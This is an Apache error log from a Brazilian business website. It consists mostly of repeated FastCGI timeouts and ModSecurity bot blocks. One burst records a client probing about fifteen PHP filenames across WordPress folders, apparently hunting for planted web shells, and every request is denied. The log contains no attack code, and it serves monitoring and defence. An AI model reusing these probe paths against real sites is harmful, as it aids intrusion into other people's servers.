[Sun Mar 15 07:22:32.110158 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40016] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:22:53.037811 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40278] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:23:15.132393 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40504] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:23:36.157839 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40720] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:23:40.953221 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.244.31:60134] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaIrHjZBu2q05ozVU-siQAAAUg"]
[Sun Mar 15 07:23:57.121888 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:40954] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:24:19.097174 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41220] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:24:40.045817 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41450] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:25:01.124607 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:25:05.418493 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.228.16:43208] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaJAHjZBu2q05ozVU-srAAAAUE"]
[Sun Mar 15 07:25:22.129819 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41958] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:25:44.096109 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42212] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:26:05.133861 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42482] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:26:26.129856 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42718] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:26:47.149879 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43014] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:27:09.125822 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43238] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:27:31.133777 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:27:52.130220 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43762] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:28:13.149817 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44022] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:28:35.149608 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:28:49.982273 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.244.31:46188] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaJ4Zqj1wV0Si-OkecxCwAAAAY"]
[Sun Mar 15 07:28:56.129842 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44462] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:29:17.098484 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44662] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:29:38.120610 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44912] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:29:59.122124 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:30:18.485019 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.228.16:48832] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaKOnjZBu2q05ozVU-tbgAAAUg"]
[Sun Mar 15 07:30:20.137816 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45380] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:30:41.125782 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45590] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:31:02.084033 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45822] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:31:24.033835 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46062] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:31:46.133832 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46348] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:31:48.744770 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] [client 157.15.40.93:45384] AH01071: Got error 'Primary script unknown'
[Sun Mar 15 07:32:07.121862 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46544] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:32:29.057844 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46758] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:32:50.021883 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46934] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:33:11.050035 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47184] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:33:32.097964 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47438] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:33:53.137775 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47698] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:34:07.238334 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.244.31:58520] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaLH5qj1wV0Si-OkecyCgAAABc"]
[Sun Mar 15 07:34:14.129970 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47984] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:34:35.127355 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48406] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:34:56.137786 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48752] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:35:17.129794 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49034] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:35:33.479003 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.228.16:48604] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaLdZqj1wV0Si-OkecyTgAAAAM"]
[Sun Mar 15 07:35:38.125800 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49350] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:35:59.132796 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:49660] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:36:21.077807 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49980] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:36:42.149833 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50350] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:37:10.120875 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50762] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:37:32.138249 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51080] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:37:53.129956 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51368] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:38:14.138444 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:38:35.085855 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51796] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:38:56.128359 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52010] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:39:07.943883 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.244.31:38106] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaMS3jZBu2q05ozVU-uzwAAAUU"]
[Sun Mar 15 07:39:17.057863 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52202] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:39:38.121800 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52396] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:39:59.115638 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52588] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:40:20.681813 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52772] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:40:42.126529 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52994] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:40:56.734911 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.228.16:45956] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaMuJqj1wV0Si-Okecy6QAAABU"]
[Sun Mar 15 07:41:03.568098 2026] [access_compat:error] [pid 21946:tid 140411641214720] [client 104.28.246.115:51278] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/style.php
[Sun Mar 15 07:41:03.746586 2026] [access_compat:error] [pid 21946:tid 140411565680384] [client 104.28.246.115:51278] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/style.php
[Sun Mar 15 07:41:03.935029 2026] [access_compat:error] [pid 21946:tid 140411590858496] [client 104.28.246.115:51278] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/themes/style.php
[Sun Mar 15 07:41:04.049838 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53260] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:41:04.117191 2026] [access_compat:error] [pid 21805:tid 140411607643904] [client 104.28.246.115:51288] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/style.php
[Sun Mar 15 07:41:04.335833 2026] [access_compat:error] [pid 21805:tid 140411683178240] [client 104.28.246.115:51288] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/style.php
[Sun Mar 15 07:41:04.517066 2026] [access_compat:error] [pid 21805:tid 140411548894976] [client 104.28.246.115:51288] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/chosen.php
[Sun Mar 15 07:41:04.695428 2026] [access_compat:error] [pid 21805:tid 140411599251200] [client 104.28.246.115:51288] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/file.php
[Sun Mar 15 07:41:04.878817 2026] [access_compat:error] [pid 21806:tid 140411716749056] [client 104.28.246.115:51294] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/flower.php
[Sun Mar 15 07:41:05.057197 2026] [access_compat:error] [pid 21806:tid 140411674785536] [client 104.28.246.115:51294] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/gifclass.php
[Sun Mar 15 07:41:05.235508 2026] [access_compat:error] [pid 21806:tid 140411741927168] [client 104.28.246.115:51294] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/bless.php
[Sun Mar 15 07:41:05.415389 2026] [access_compat:error] [pid 21533:tid 140411607643904] [client 104.28.246.115:51304] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/class-t.api.php
[Sun Mar 15 07:41:05.595154 2026] [access_compat:error] [pid 21533:tid 140411632822016] [client 104.28.246.115:51304] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/blurbs.php
[Sun Mar 15 07:41:05.774849 2026] [access_compat:error] [pid 21533:tid 140411725141760] [client 104.28.246.115:51304] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/akcc.php
[Sun Mar 15 07:41:05.953652 2026] [access_compat:error] [pid 21533:tid 140411658000128] [client 104.28.246.115:51304] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/abcd.php
[Sun Mar 15 07:41:06.133787 2026] [access_compat:error] [pid 21533:tid 140411565680384] [client 104.28.246.115:51304] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/shelp.php
[Sun Mar 15 07:41:06.315200 2026] [access_compat:error] [pid 21806:tid 140411590858496] [client 104.28.246.115:51308] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/cord.php
[Sun Mar 15 07:41:06.494160 2026] [access_compat:error] [pid 21806:tid 140411699963648] [client 104.28.246.115:51308] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/dex.php
[Sun Mar 15 07:41:25.117785 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:41:46.035444 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53630] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:42:07.125819 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53804] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:42:31.092905 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54064] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:42:54.494935 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54318] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:43:16.061883 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54492] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:43:37.041803 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:43:58.110016 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54946] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:44:19.069816 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55126] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:44:36.247118 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.244.31:45776] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaNlNSswJuvopo3lOi_xgAAAIE"]
[Sun Mar 15 07:44:40.133837 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55318] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:45:01.137848 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55504] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:45:22.125788 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55702] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:45:43.149831 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55918] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:46:03.814175 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.228.16:43230] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaN63jZBu2q05ozVU-vqAAAAVE"]
[Sun Mar 15 07:46:04.122355 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56142] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:46:25.125786 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56334] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:46:46.058262 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56590] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:47:07.055601 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56788] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:47:28.120850 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56968] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:47:52.161334 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57196] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:48:14.113985 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57434] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:48:38.524217 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57688] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:49:00.057851 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:49:21.133846 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58180] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:49:38.034434 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.244.31:51830] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaOwnbQATo66fKoS7ygMAAAAMM"]
[Sun Mar 15 07:49:42.121830 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58394] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:50:03.118181 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58646] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:50:24.125789 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58876] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:50:45.117815 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59164] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:51:06.128776 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:51:27.121834 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59630] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:51:48.126869 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:52:09.069813 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60004] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:52:31.069894 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60260] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:52:52.153795 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:53:13.097847 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:53:36.089940 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32902] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:54:00.125822 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33186] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:54:21.085815 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:54:42.085827 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33662] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:55:03.130221 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33842] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:55:24.117785 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34018] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:55:45.137812 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34210] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:56:06.125785 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34436] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:56:27.122391 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34638] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:56:49.125800 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34942] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:57:10.104476 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35148] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:57:31.127024 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35362] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:57:52.129814 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:58:13.057838 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35858] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:58:34.121864 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36052] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:58:58.133814 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36346] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:59:21.129873 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:59:42.129786 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36836] AH01075: Error dispatching request to : (polling)
